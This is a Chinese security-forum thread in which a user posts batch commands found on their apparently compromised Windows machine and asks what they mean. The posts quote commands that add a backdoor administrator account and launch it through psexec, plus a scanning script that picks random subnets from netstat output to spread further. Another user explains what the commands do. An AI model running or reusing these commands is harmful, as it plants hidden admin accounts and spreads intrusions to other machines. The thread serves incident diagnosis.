|
 | 作者: aa [haizhe]
 论坛用户 |
登录 |
| net user admin KKKKKKK /add net user admin KKKKKKK net localgroup administrators admin /add start /i /min /wait /B psexec \\127.0.0.1 -u admin -p "KKKKKKK" -d cmd.exe /c START.BAT 什么意思 |
| 地主 发表时间: 06/08 15:47 |
| 回复: aa [haizhe] 论坛用户 |
登录 |
|
CALL MUMA.BAT SET IPA=192.168 CALL 10.BAT 0 :NEARAGAIN netstat -n|find ":" >A.TMP FOR /F "tokens=7,8,9,10 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& CALL NEAR.BAT :START CALL RANDOM.BAT IF "%NUM1%"=="255" GOTO NEARAGAIN IF "%NUM1%"=="192" GOTO NEARAGAIN IF "%NUM1%"=="127" GOTO NEARAGAIN IF "%NUM2%"=="255" GOTO NEARAGAIN IF "%NUM3%"=="255" GOTO NEARAGAIN IF "%NUM4%"=="255" GOTO NEARAGAIN REM ========================================= SET IPA=%NUM1%.%NUM2% ECHO START > A.LOG PING %IPA%.%NUM3%.1>B.TMP FIND /C /I "from" B.TMP IF ERRORLEVEL 1 GOTO START start /min /B CALL 10.BAT %NUM3% DEL A.LOG GOTO START |
| B1层 发表时间: 06/08 15:52 |
 | 回复: svlie [svlie]  论坛用户 |
登录 |
|
你在那找到这些的 ??? |
| B2层 发表时间: 06/08 17:37 |
| 回复: aa [haizhe] 论坛用户 |
登录 |
|
不好意思 我的机器里边 应该是被人入侵了 呵呵 |
| B3层 发表时间: 06/08 18:32 |
 | 回复: qq [zpisgod]  论坛用户 |
登录 |
|
net user admin KKKKKKK /add net user admin KKKKKKK net localgroup administrators admin /add 是添加了一个用户名和密码 为KKKKKKK的用户,并且添加到了超级用户组里面,可以用它来作坏事了 。 下面的水平有限,只能来猜测了:start /i /min /wait /B psexec \\127.0.0.1 -u admin -p "KKKKKKK" -d cmd.exe /c START.BAT 以最小化的方式运行 atart.bat 应该是扫描一个网段来找有KKKKKKK这个用户的机器,下面那一贴就是那个.bat文件的代码了 |
| B4层 发表时间: 06/09 14:04 |
 | 回复: maomao520 [maomao520]  论坛用户 |
登录 |
|
晕,真厉害! |
| B5层 发表时间: 06/09 14:08 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 帮忙